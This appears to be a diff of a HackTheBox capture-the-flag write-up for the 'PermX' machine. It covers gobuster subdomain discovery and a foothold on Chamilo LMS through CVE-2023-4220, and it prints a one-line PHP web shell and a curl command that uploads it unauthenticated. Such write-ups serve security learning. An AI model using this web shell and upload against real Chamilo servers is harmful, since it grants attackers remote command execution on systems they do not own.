el-axolotl/HackTheBox_Writeups/write_ups/permx/README.md

 - For the next phase of reconnaissance, we should try scanning for subdomains.
 The tool I use for this is Gobuster, which has the following syntax:

     ```
-    gobuster vhost -w /path/to/wordlist.txt -u permx.htb --append-domain
+    gobuster vhost -w /path/to/wordlist.txt -u http://victim_url.fun --append-domain
     ```

     - If you don't know where to get a wordlist for gobuster, checkout SecLists: https://github.com/danielmiessler/SecLists

-- After letting gobuster scan for subdomains, you may find a new URL: http://lms.permx.htb
+- After letting gobuster scan for subdomains, you may find a new URL: http://lms.permx.htb.
+A login page for Chamilo.

+## Establishing a foothold

+Next, we should search the internet for known chamilo lms exploits.
+I found the following advisory (CVE-2023-4220): https://starlabs.sg/advisories/23/23-4220/

+The bulletin states that Chamilo is PHP based, and confirms a vulnerability that allows an unauthenticated user to upload files to '/main/inc/lib/javascript/bigupload/files'.
+The bulletin also provides a blueprint for our attack in their proof of concept:

+- We start by creating a simple PHP script on our attack machine that uses the system() function to execute commands passed to the 'cmd' parameter through the HTTP GET method.
+I'll name mine webshell.php

+    #### webshell.php

+    ```PHP
+    <?php echo system($_GET["cmd"])?>
+    ```

+- Next, from our attack machine, we'll use curl to upload webshell.php

+    #### Terminal

+    ```bash
+    curl -F 'bigUploadFile=@webshell.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
+    ```

+    - You should receive the following output: The file has successfully been uploaded.

 # Additional resources